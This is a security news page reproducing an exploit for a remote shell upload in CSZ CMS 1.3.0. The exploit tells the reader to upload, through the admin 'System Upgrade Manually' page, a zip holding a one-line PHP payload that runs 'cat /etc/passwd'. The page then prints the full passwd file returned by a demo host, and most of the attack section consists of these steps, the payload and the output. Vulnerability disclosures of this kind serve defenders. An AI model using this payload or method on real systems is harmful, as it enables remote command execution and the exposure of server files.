Security
Headlines
HeadlinesLatestCVEs

Headline

CSZ CMS 1.3.0 Shell Upload

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

Packet Storm
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#ubuntu#linux#debian#cisco#apache#java#php#perl#auth#ssh#ruby

CSZ CMS 1.3.0 Shell Upload

Posted Nov 25, 2023

Authored by tmrswrr

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | b8f0f3c59686781c297f072ed9c3ca2896c1c6ea8f3916447a7e73c9086eb19a

Download | Favorite | View

CSZ CMS 1.3.0 Shell Upload

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution# Date: 23/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.cszcms.com/# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download# Version: Version 1.3.0# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSqwoqwrdkog/admin/upgrade2 ) System Upgrade Manually  and upload this test.zip file :<?php echo system('cat /etc/passwd'); ?>3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.phproot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

File Tags

  • ActiveX (932)
  • Advisory (83,267)
  • Arbitrary (16,401)
  • BBS (2,859)
  • Bypass (1,803)
  • CGI (1,029)
  • Code Execution (7,417)
  • Conference (682)
  • Cracker (843)
  • CSRF (3,353)
  • DoS (23,990)
  • Encryption (2,372)
  • Exploit (52,241)
  • File Inclusion (4,233)
  • File Upload (977)
  • Firewall (822)
  • Info Disclosure (2,807)
  • Intrusion Detection (900)
  • Java (3,091)
  • JavaScript (879)
  • Kernel (6,834)
  • Local (14,569)
  • Magazine (586)
  • Overflow (12,849)
  • Perl (1,426)
  • PHP (5,162)
  • Proof of Concept (2,349)
  • Protocol (3,652)
  • Python (1,566)
  • Remote (31,026)
  • Root (3,605)
  • Rootkit (515)
  • Ruby (614)
  • Scanner (1,645)
  • Security Tool (7,926)
  • Shell (3,209)
  • Shellcode (1,216)
  • Sniffer (897)
  • Spoof (2,229)
  • SQL Injection (16,436)
  • TCP (2,419)
  • Trojan (687)
  • UDP (896)
  • Virus (667)
  • Vulnerability (32,079)
  • Web (9,786)
  • Whitepaper (3,757)
  • x86 (966)
  • XSS (18,042)
  • Other

File Archives

  • November 2023
  • October 2023
  • September 2023
  • August 2023
  • July 2023
  • June 2023
  • May 2023
  • April 2023
  • March 2023
  • February 2023
  • January 2023
  • December 2022
  • Older

Systems

  • AIX (429)
  • Apple (2,037)
  • BSD (375)
  • CentOS (57)
  • Cisco (1,926)
  • Debian (6,907)
  • Fedora (1,692)
  • FreeBSD (1,246)
  • Gentoo (4,375)
  • HPUX (880)
  • iOS (363)
  • iPhone (108)
  • IRIX (220)
  • Juniper (69)
  • Linux (47,744)
  • Mac OS X (691)
  • Mandriva (3,105)
  • NetBSD (256)
  • OpenBSD (486)
  • RedHat (14,557)
  • Slackware (941)
  • Solaris (1,611)
  • SUSE (1,444)
  • Ubuntu (9,110)
  • UNIX (9,338)
  • UnixWare (187)
  • Windows (6,605)
  • Other

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution